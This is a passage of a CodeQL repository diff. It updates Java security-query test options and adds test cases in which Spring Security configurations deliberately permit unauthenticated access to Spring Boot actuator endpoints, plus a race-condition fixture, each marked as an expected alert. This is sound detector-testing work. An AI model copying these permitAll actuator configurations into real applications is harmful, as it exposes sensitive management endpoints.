${testdir}/../../../../../stubs/servlet-api-2.4:${testdir}/../../../../../stubs/apache-commons-io-2.6:${testdir}/../../../../../stubs/cargo:${testdir}/../../../../../stubs/apache-ant-1.10.13:${testdir}/../../../../../stubs/stapler-1.263:${testdir}/../../../../../stubs/javax-servlet-2.5:${testdir}/../../../../../stubs/apache-commons-jelly-1.0.1:${testdir}/../../../../../stubs/apache-commons-fileupload-1.4:${testdir}/../../../../../stubs/saxon-xqj-9.x:${testdir}/../../../../../stubs/apache-commons-beanutils:${testdir}/../../../../../stubs/dom4j-2.1.1:${testdir}/../../../../../stubs/apache-commons-lang:${testdir}/../../../../../stubs/jaxen-1.2.0:${testdir}/../../../../../stubs/jmh-1.3.6:${testdir}/../../../../../stubs/springframework-5.3.8:${testdir}/../../../../../stubs/jaxws-api-2.0:${testdir}/../../../../../stubs/apache-cxf +// semmle-extractor-options: --javac-args -cp ${testdir}/../../../../../stubs/servlet-api-2.4:${testdir}/../../../../../stubs/apache-commons-io-2.6:${testdir}/../../../../../stubs/cargo:${testdir}/../../../../../stubs/apache-ant-1.10.13:${testdir}/../../../../../stubs/stapler-1.263:${testdir}/../../../../../stubs/javax-servlet-2.5:${testdir}/../../../../../stubs/apache-commons-jelly-1.0.1:${testdir}/../../../../../stubs/apache-commons-fileupload-1.4:${testdir}/../../../../../stubs/saxon-xqj-9.x:${testdir}/../../../../../stubs/apache-commons-beanutils:${testdir}/../../../../../stubs/dom4j-2.1.1:${testdir}/../../../../../stubs/apache-commons-lang:${testdir}/../../../../../stubs/jaxen-1.2.0:${testdir}/../../../../../stubs/jmh-1.3.6:${testdir}/../../../../../stubs/springframework-5.8.x:${testdir}/../../../../../stubs/jaxws-api-2.0:${testdir}/../../../../../stubs/apache-cxf diff --git a/java/ql/test/query-tests/security/CWE-074/options b/java/ql/test/query-tests/security/CWE-074/options index 058d3f3e803c..becd1ca3f587 100644 --- a/java/ql/test/query-tests/security/CWE-074/options +++ b/java/ql/test/query-tests/security/CWE-074/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../stubs/springframework-5.3.8:${testdir}/../../../stubs/shiro-core-1.5.2:${testdir}/../../../stubs/spring-ldap-2.3.2:${testdir}/../../../stubs/Saxon-HE-9.9.1-7:${testdir}/../../../stubs/apache-commons-logging-1.2 +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../stubs/springframework-5.8.x:${testdir}/../../../stubs/shiro-core-1.5.2:${testdir}/../../../stubs/spring-ldap-2.3.2:${testdir}/../../../stubs/Saxon-HE-9.9.1-7:${testdir}/../../../stubs/apache-commons-logging-1.2 diff --git a/java/ql/test/query-tests/security/CWE-079/semmle/tests/options b/java/ql/test/query-tests/security/CWE-079/semmle/tests/options index 78c431eb6834..399dceb33a69 100644 --- a/java/ql/test/query-tests/security/CWE-079/semmle/tests/options +++ b/java/ql/test/query-tests/security/CWE-079/semmle/tests/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../../stubs/servlet-api-2.4:${testdir}/../../../../../stubs/javax-ws-rs-api-2.1.1/:${testdir}/../../../../../stubs/springframework-5.3.8:${testdir}/../../../../../stubs/javax-faces-2.3/:${testdir}/../../../../../stubs/google-android-9.0.0:${testdir}/../../../../../stubs/jenkins +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../../stubs/servlet-api-2.4:${testdir}/../../../../../stubs/javax-ws-rs-api-2.1.1/:${testdir}/../../../../../stubs/springframework-5.8.x:${testdir}/../../../../../stubs/javax-faces-2.3/:${testdir}/../../../../../stubs/google-android-9.0.0:${testdir}/../../../../../stubs/jenkins diff --git a/java/ql/test/query-tests/security/CWE-089/semmle/examples/options b/java/ql/test/query-tests/security/CWE-089/semmle/examples/options index 8c08f8334017..832af0f3423c 100644 --- a/java/ql/test/query-tests/security/CWE-089/semmle/examples/options +++ b/java/ql/test/query-tests/security/CWE-089/semmle/examples/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../../stubs/mongodbClient:${testdir}/../../../../../stubs/springframework-5.3.8:${testdir}/../../../../../stubs/apache-hive --release 21 +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../../stubs/mongodbClient:${testdir}/../../../../../stubs/springframework-5.8.x:${testdir}/../../../../../stubs/apache-hive --release 21 diff --git a/java/ql/test/query-tests/security/CWE-090/options b/java/ql/test/query-tests/security/CWE-090/options index 20bcd741bf6f..285b19e2b42a 100644 --- a/java/ql/test/query-tests/security/CWE-090/options +++ b/java/ql/test/query-tests/security/CWE-090/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../stubs/springframework-5.3.8:${testdir}/../../../stubs/spring-ldap-2.3.2:${testdir}/../../../stubs/unboundid-ldap-4.0.14:${testdir}/../../../stubs/esapi-2.0.1:${testdir}/../../../stubs/apache-ldap-1.0.2 +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../stubs/springframework-5.8.x:${testdir}/../../../stubs/spring-ldap-2.3.2:${testdir}/../../../stubs/unboundid-ldap-4.0.14:${testdir}/../../../stubs/esapi-2.0.1:${testdir}/../../../stubs/apache-ldap-1.0.2 diff --git a/java/ql/test/query-tests/security/CWE-094/options b/java/ql/test/query-tests/security/CWE-094/options index 469e3df8ac09..94c205e754b2 100644 --- a/java/ql/test/query-tests/security/CWE-094/options +++ b/java/ql/test/query-tests/security/CWE-094/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../stubs/validation-api-2.0.1.Final:${testdir}/../../../stubs/springframework-5.3.8:${testdir}/../../../stubs/apache-commons-jexl-2.1.1:${testdir}/../../../stubs/apache-commons-jexl-3.1:${testdir}/../../../stubs/apache-commons-logging-1.2:${testdir}/../../../stubs/mvel2-2.4.7:${testdir}/../../../stubs/groovy-all-3.0.7:${testdir}/../../../stubs/servlet-api-2.4:${testdir}/../../../stubs/scriptengine:${testdir}/../../../stubs/jsr223-api:${testdir}/../../../stubs/apache-freemarker-2.3.31:${testdir}/../../../stubs/jinjava-2.6.0:${testdir}/../../../stubs/pebble-3.1.5:${testdir}/../../../stubs/thymeleaf-3.0.14:${testdir}/../../../stubs/apache-velocity-2.3:${testdir}/../../..//stubs/google-android-9.0.0 +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../stubs/validation-api-2.0.1.Final:${testdir}/../../../stubs/springframework-5.8.x:${testdir}/../../../stubs/apache-commons-jexl-2.1.1:${testdir}/../../../stubs/apache-commons-jexl-3.1:${testdir}/../../../stubs/apache-commons-logging-1.2:${testdir}/../../../stubs/mvel2-2.4.7:${testdir}/../../../stubs/groovy-all-3.0.7:${testdir}/../../../stubs/servlet-api-2.4:${testdir}/../../../stubs/scriptengine:${testdir}/../../../stubs/jsr223-api:${testdir}/../../../stubs/apache-freemarker-2.3.31:${testdir}/../../../stubs/jinjava-2.6.0:${testdir}/../../../stubs/pebble-3.1.5:${testdir}/../../../stubs/thymeleaf-3.0.14:${testdir}/../../../stubs/apache-velocity-2.3:${testdir}/../../..//stubs/google-android-9.0.0 diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/title_slide.html b/java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/SpringBootActuatorsTest.expected similarity index 100% rename from docs/codeql/ql-training/_static-training/slides-semmle-2/title_slide.html rename to java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/SpringBootActuatorsTest.expected diff --git a/java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/SpringBootActuatorsTest.java b/java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/SpringBootActuatorsTest.java new file mode 100644 index 000000000000..4b5d7614eef6 --- /dev/null +++ b/java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/SpringBootActuatorsTest.java @@ -0,0 +1,281 @@ +import org.springframework.boot.actuate.autoconfigure.security.servlet.EndpointRequest; +import org.springframework.security.config.annotation.web.builders.HttpSecurity; + +public class SpringBootActuatorsTest { + // Spring security version 5.2.3 used `authorizeRequests` and `requestMatcher(s)` + protected void configure(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests(requests -> requests.anyRequest().permitAll()); // $ hasExposedSpringBootActuator + } + + protected void configure2(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); // $ hasExposedSpringBootActuator + } + + protected void configure3(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); // $ hasExposedSpringBootActuator + } + + protected void configure4(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest().permitAll(); // $ hasExposedSpringBootActuator + } + + protected void configure5(HttpSecurity http) throws Exception { + http.authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); // $ hasExposedSpringBootActuator + } + + protected void configure6(HttpSecurity http) throws Exception { + http.authorizeRequests(requests -> requests.requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll()); // $ hasExposedSpringBootActuator + } + + protected void configure7(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest().permitAll(); // $ hasExposedSpringBootActuator + } + + protected void configureOk1(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOk2(HttpSecurity http) throws Exception { + http.requestMatchers().requestMatchers(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOk3(HttpSecurity http) throws Exception { + http.authorizeRequests().anyRequest().permitAll(); + } + + protected void configureOk4(HttpSecurity http) throws Exception { + http.authorizeRequests(authz -> authz.anyRequest().permitAll()); + } + + protected void configureOkSafeEndpoints1(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.to("health", "info")).authorizeRequests(requests -> requests.anyRequest().permitAll()); + } + + protected void configureOkSafeEndpoints2(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.to("health")).authorizeRequests().requestMatchers(EndpointRequest.to("health")).permitAll(); + } + + protected void configureOkSafeEndpoints3(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.to("health", "info")).authorizeRequests().requestMatchers(EndpointRequest.to("health", "info")).permitAll(); + } + + protected void configureOkSafeEndpoints4(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.to("health", "info")).authorizeRequests().anyRequest().permitAll(); + } + + protected void configureOkSafeEndpoints5(HttpSecurity http) throws Exception { + http.authorizeRequests().requestMatchers(EndpointRequest.to("health", "info")).permitAll(); + } + + protected void configureOkSafeEndpoints6(HttpSecurity http) throws Exception { + http.authorizeRequests(requests -> requests.requestMatchers(EndpointRequest.to("health", "info")).permitAll()); + } + + protected void configureOkSafeEndpoints7(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.to("health", "info")).authorizeRequests().anyRequest().permitAll(); + } + + protected void configureOkNoPermitAll1(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests(requests -> requests.anyRequest()); + } + + protected void configureOkNoPermitAll2(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOkNoPermitAll3(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOkNoPermitAll4(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest(); + } + + protected void configureOkNoPermitAll5(HttpSecurity http) throws Exception { + http.authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOkNoPermitAll6(HttpSecurity http) throws Exception { + http.authorizeRequests(requests -> requests.requestMatchers(EndpointRequest.toAnyEndpoint())); + } + + protected void configureOkNoPermitAll7(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest(); + } + + // Spring security version 5.5.0 introduced `authorizeHttpRequests` + protected void configure_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests(requests -> requests.anyRequest().permitAll()); // $ hasExposedSpringBootActuator + } + + protected void configure2_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); // $ hasExposedSpringBootActuator + } + + protected void configure3_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); // $ hasExposedSpringBootActuator + } + + protected void configure4_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().anyRequest().permitAll(); // $ hasExposedSpringBootActuator + } + + protected void configure5_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.authorizeHttpRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); // $ hasExposedSpringBootActuator + } + + protected void configure6_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.authorizeHttpRequests(requests -> requests.requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll()); // $ hasExposedSpringBootActuator + } + + protected void configure7_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().anyRequest().permitAll(); // $ hasExposedSpringBootActuator + } + + protected void configureOk3_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.authorizeHttpRequests().anyRequest().permitAll(); + } + + protected void configureOk4_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.authorizeHttpRequests(authz -> authz.anyRequest().permitAll()); + } + + protected void configureOkSafeEndpoints1_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.to("health", "info")).authorizeHttpRequests(requests -> requests.anyRequest().permitAll()); + } + + protected void configureOkSafeEndpoints2_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.to("health")).authorizeHttpRequests().requestMatchers(EndpointRequest.to("health")).permitAll(); + } + + protected void configureOkSafeEndpoints3_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.to("health", "info")).authorizeHttpRequests().requestMatchers(EndpointRequest.to("health", "info")).permitAll(); + } + + protected void configureOkSafeEndpoints4_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.to("health", "info")).authorizeHttpRequests().anyRequest().permitAll(); + } + + protected void configureOkSafeEndpoints5_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.authorizeHttpRequests().requestMatchers(EndpointRequest.to("health", "info")).permitAll(); + } + + protected void configureOkSafeEndpoints6_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.authorizeHttpRequests(requests -> requests.requestMatchers(EndpointRequest.to("health", "info")).permitAll()); + } + + protected void configureOkSafeEndpoints7_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.to("health", "info")).authorizeHttpRequests().anyRequest().permitAll(); + } + + protected void configureOkNoPermitAll1_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests(requests -> requests.anyRequest()); + } + + protected void configureOkNoPermitAll2_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOkNoPermitAll3_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOkNoPermitAll4_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().anyRequest(); + } + + protected void configureOkNoPermitAll5_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.authorizeHttpRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOkNoPermitAll6_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.authorizeHttpRequests(requests -> requests.requestMatchers(EndpointRequest.toAnyEndpoint())); + } + + protected void configureOkNoPermitAll7_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().anyRequest(); + } + + // Spring security version 5.8.0 introduced `securityMatcher(s)` + protected void configure_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests(requests -> requests.anyRequest().permitAll()); // $ hasExposedSpringBootActuator + } + + protected void configure2_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); // $ hasExposedSpringBootActuator + } + + protected void configure3_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); // $ hasExposedSpringBootActuator + } + + protected void configure4_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().anyRequest().permitAll(); // $ hasExposedSpringBootActuator + } + + protected void configure7_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().anyRequest().permitAll(); // $ hasExposedSpringBootActuator + } + + protected void configureOk1_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatcher(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOk2_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatchers().requestMatchers(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOkSafeEndpoints1_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatcher(EndpointRequest.to("health", "info")).authorizeHttpRequests(requests -> requests.anyRequest().permitAll()); + } + + protected void configureOkSafeEndpoints2_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatcher(EndpointRequest.to("health")).authorizeHttpRequests().requestMatchers(EndpointRequest.to("health")).permitAll(); + } + + protected void configureOkSafeEndpoints3_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatchers(matcher -> EndpointRequest.to("health", "info")).authorizeHttpRequests().requestMatchers(EndpointRequest.to("health", "info")).permitAll(); + } + + protected void configureOkSafeEndpoints4_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatcher(EndpointRequest.to("health", "info")).authorizeHttpRequests().anyRequest().permitAll(); + } + + protected void configureOkSafeEndpoints7_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatchers(matcher -> EndpointRequest.to("health", "info")).authorizeHttpRequests().anyRequest().permitAll(); + } + + protected void configureOkNoPermitAll1_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests(requests -> requests.anyRequest()); + } + + protected void configureOkNoPermitAll2_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOkNoPermitAll3_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOkNoPermitAll4_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().anyRequest(); + } + + protected void configureOkNoPermitAll7_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().anyRequest(); + } + + // QHelp Bad example + public void securityFilterChain1(HttpSecurity http) throws Exception { + // BAD: Unauthenticated access to Spring Boot actuator endpoints is allowed + http.securityMatcher(EndpointRequest.toAnyEndpoint()); + http.authorizeHttpRequests((requests) -> requests.anyRequest().permitAll()); // $ hasExposedSpringBootActuator + } + + // QHelp Good example + public void securityFilterChain2(HttpSecurity http) throws Exception { + // GOOD: only users with ENDPOINT_ADMIN role are allowed to access the actuator endpoints + http.securityMatcher(EndpointRequest.toAnyEndpoint()); + http.authorizeHttpRequests((requests) -> requests.anyRequest().hasRole("ENDPOINT_ADMIN")); + } +} diff --git a/java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/SpringBootActuatorsTest.ql b/java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/SpringBootActuatorsTest.ql new file mode 100644 index 000000000000..214886fce511 --- /dev/null +++ b/java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/SpringBootActuatorsTest.ql @@ -0,0 +1,19 @@ +import java +import semmle.code.java.frameworks.spring.SpringSecurity +import semmle.code.java.security.SpringBootActuatorsQuery +import utils.test.InlineExpectationsTest + +module SpringBootActuatorsTest implements TestSig { + string getARelevantTag() { result = "hasExposedSpringBootActuator" } + + predicate hasActualResult(Location location, string element, string tag, string value) { + tag = "hasExposedSpringBootActuator" and + exists(SpringPermitAllCall permitAllCall | permitsSpringBootActuators(permitAllCall) | + permitAllCall.getLocation() = location and + element = permitAllCall.toString() and + value = "" + ) + } +} + +import MakeTest diff --git a/java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/options b/java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/options new file mode 100644 index 000000000000..ab29fd4e46fa --- /dev/null +++ b/java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/options @@ -0,0 +1 @@ +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../../../stubs/springframework-5.8.x diff --git a/java/ql/test/query-tests/security/CWE-327/semmle/tests/MaybeBrokenCryptoAlgorithm.expected b/java/ql/test/query-tests/security/CWE-327/semmle/tests/MaybeBrokenCryptoAlgorithm.expected index da6f6312a896..bb5acb44d6dd 100644 --- a/java/ql/test/query-tests/security/CWE-327/semmle/tests/MaybeBrokenCryptoAlgorithm.expected +++ b/java/ql/test/query-tests/security/CWE-327/semmle/tests/MaybeBrokenCryptoAlgorithm.expected @@ -6,7 +6,7 @@ nodes | WeakHashing.java:21:56:21:91 | getProperty(...) | semmle.label | getProperty(...) | subpaths #select -| Test.java:34:21:34:53 | new SecretKeySpec(...) | Test.java:34:48:34:52 | "foo" | Test.java:34:48:34:52 | "foo" | Cryptographic algorithm $@ may not be secure, consider using a different algorithm. | Test.java:34:48:34:52 | "foo" | foo | -| WeakHashing.java:15:29:15:84 | getInstance(...) | WeakHashing.java:15:55:15:83 | getProperty(...) | WeakHashing.java:15:55:15:83 | getProperty(...) | Cryptographic algorithm $@ may not be secure, consider using a different algorithm. | WeakHashing.java:15:55:15:83 | getProperty(...) | MD5 | -| WeakHashing.java:18:30:18:96 | getInstance(...) | WeakHashing.java:18:56:18:95 | getProperty(...) | WeakHashing.java:18:56:18:95 | getProperty(...) | Cryptographic algorithm $@ may not be secure, consider using a different algorithm. | WeakHashing.java:18:56:18:95 | getProperty(...) | MD5 | -| WeakHashing.java:21:30:21:92 | getInstance(...) | WeakHashing.java:21:56:21:91 | getProperty(...) | WeakHashing.java:21:56:21:91 | getProperty(...) | Cryptographic algorithm $@ may not be secure, consider using a different algorithm. | WeakHashing.java:21:56:21:91 | getProperty(...) | MD5 | +| Test.java:34:21:34:53 | new SecretKeySpec(...) | Test.java:34:48:34:52 | "foo" | Test.java:34:48:34:52 | "foo" | Cryptographic algorithm $@ may not be secure. Consider using a different algorithm. | Test.java:34:48:34:52 | "foo" | foo | +| WeakHashing.java:15:29:15:84 | getInstance(...) | WeakHashing.java:15:55:15:83 | getProperty(...) | WeakHashing.java:15:55:15:83 | getProperty(...) | Cryptographic algorithm $@ may not be secure. Consider using a different algorithm. | WeakHashing.java:15:55:15:83 | getProperty(...) | MD5 | +| WeakHashing.java:18:30:18:96 | getInstance(...) | WeakHashing.java:18:56:18:95 | getProperty(...) | WeakHashing.java:18:56:18:95 | getProperty(...) | Cryptographic algorithm $@ may not be secure. Consider using a different algorithm. | WeakHashing.java:18:56:18:95 | getProperty(...) | MD5 | +| WeakHashing.java:21:30:21:92 | getInstance(...) | WeakHashing.java:21:56:21:91 | getProperty(...) | WeakHashing.java:21:56:21:91 | getProperty(...) | Cryptographic algorithm $@ may not be secure. Consider using a different algorithm. | WeakHashing.java:21:56:21:91 | getProperty(...) | MD5 | diff --git a/java/ql/test/query-tests/security/CWE-352/options b/java/ql/test/query-tests/security/CWE-352/options index 1fef01772fe9..d23a76bd9025 100644 --- a/java/ql/test/query-tests/security/CWE-352/options +++ b/java/ql/test/query-tests/security/CWE-352/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../stubs/springframework-5.3.8/:${testdir}/../../../stubs/org.mybatis-3.5.4/:${testdir}/../../../stubs/stapler-1.263/:${testdir}/../../../stubs/javax-servlet-2.5:${testdir}/../../../stubs/apache-commons-jelly-1.0.1:${testdir}/../../../stubs/apache-commons-fileupload-1.4:${testdir}/../../../stubs/saxon-xqj-9.x:${testdir}/../../../stubs/apache-commons-beanutils:${testdir}/../../../stubs/dom4j-2.1.1:${testdir}/../../../stubs/apache-commons-lang:${testdir}/../../../stubs/jaxen-1.2.0:${testdir}/../../../stubs/apache-commons-logging-1.2/ +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../stubs/springframework-5.8.x/:${testdir}/../../../stubs/org.mybatis-3.5.4/:${testdir}/../../../stubs/stapler-1.263/:${testdir}/../../../stubs/javax-servlet-2.5:${testdir}/../../../stubs/apache-commons-jelly-1.0.1:${testdir}/../../../stubs/apache-commons-fileupload-1.4:${testdir}/../../../stubs/saxon-xqj-9.x:${testdir}/../../../stubs/apache-commons-beanutils:${testdir}/../../../stubs/dom4j-2.1.1:${testdir}/../../../stubs/apache-commons-lang:${testdir}/../../../stubs/jaxen-1.2.0:${testdir}/../../../stubs/apache-commons-logging-1.2/ diff --git a/java/ql/test/query-tests/security/CWE-367/semmle/tests/FieldAlwaysLocked.java b/java/ql/test/query-tests/security/CWE-367/semmle/tests/FieldAlwaysLocked.java new file mode 100644 index 000000000000..71a463364b84 --- /dev/null +++ b/java/ql/test/query-tests/security/CWE-367/semmle/tests/FieldAlwaysLocked.java @@ -0,0 +1,24 @@ +package test.cwe367.semmle.tests; + +import java.util.Enumeration; +import java.util.Hashtable; + +class FieldAlwaysLocked { + + Hashtable field; + + public FieldAlwaysLocked() { + field = new Hashtable(); + } + + protected synchronized void checkOut() { + Object o; + if (field.size() > 0) { + Enumeration e = field.keys(); + while (e.hasMoreElements()) { + o = e.nextElement(); + field.remove(o); + } + } + } +} diff --git a/java/ql/test/query-tests/security/CWE-367/semmle/tests/FieldNotAlwaysLocked.java b/java/ql/test/query-tests/security/CWE-367/semmle/tests/FieldNotAlwaysLocked.java new file mode 100644 index 000000000000..cdae7f924e58 --- /dev/null +++ b/java/ql/test/query-tests/security/CWE-367/semmle/tests/FieldNotAlwaysLocked.java @@ -0,0 +1,28 @@ +package test.cwe367.semmle.tests; + +import java.util.Enumeration; +import java.util.Hashtable; + +class FieldNotAlwaysLocked { + + Hashtable field; + + public FieldNotAlwaysLocked() { + field = new Hashtable(); + } + + protected synchronized void checkOut() { + Object o; + if (field.size() > 0) { + Enumeration e = field.keys(); // $ Alert + while (e.hasMoreElements()) { + o = e.nextElement(); + field.remove(o); // $ Alert + } + } + } + + protected void modifyUnlocked() { + field = new Hashtable(); + } +} diff --git a/java/ql/test/query-tests/security/CWE-367/semmle/tests/TOCTOURace.expected b/java/ql/test/query-tests/security/CWE-367/semmle/tests/TOCTOURace.expected index f68820385401..f2dc9f8aa957 100644 --- a/java/ql/test/query-tests/security/CWE-367/semmle/tests/TOCTOURace.expected +++ b/java/ql/test/query-tests/security/CWE-367/semmle/tests/TOCTOURace.expected @@ -1,3 +1,5 @@ +| FieldNotAlwaysLocked.java:17:41:17:52 | keys(...) | This uses the state of $@ which $@. But these are not jointly synchronized. | FieldNotAlwaysLocked.java:8:19:8:23 | field | field | FieldNotAlwaysLocked.java:16:21:16:32 | size(...) | is checked at a previous call | +| FieldNotAlwaysLocked.java:20:33:20:47 | remove(...) | This uses the state of $@ which $@. But these are not jointly synchronized. | FieldNotAlwaysLocked.java:8:19:8:23 | field | field | FieldNotAlwaysLocked.java:16:21:16:32 | size(...) | is checked at a previous call | | Test.java:13:4:13:10 | act(...) | This uses the state of $@ which $@. But these are not jointly synchronized. | Test.java:10:32:10:41 | r | r | Test.java:12:7:12:18 | getState(...) | is checked at a previous call | | Test.java:20:4:20:10 | act(...) | This uses the state of $@ which $@. But these are not jointly synchronized. | Test.java:17:32:17:42 | r | r | Test.java:19:7:19:18 | getState(...) | is checked at a previous call | | Test.java:27:4:27:10 | act(...) | This uses the state of $@ which $@. But these are not jointly synchronized. | Test.java:24:19:24:28 | r | r | Test.java:26:7:26:18 | getState(...) | is checked at a previous call | diff --git 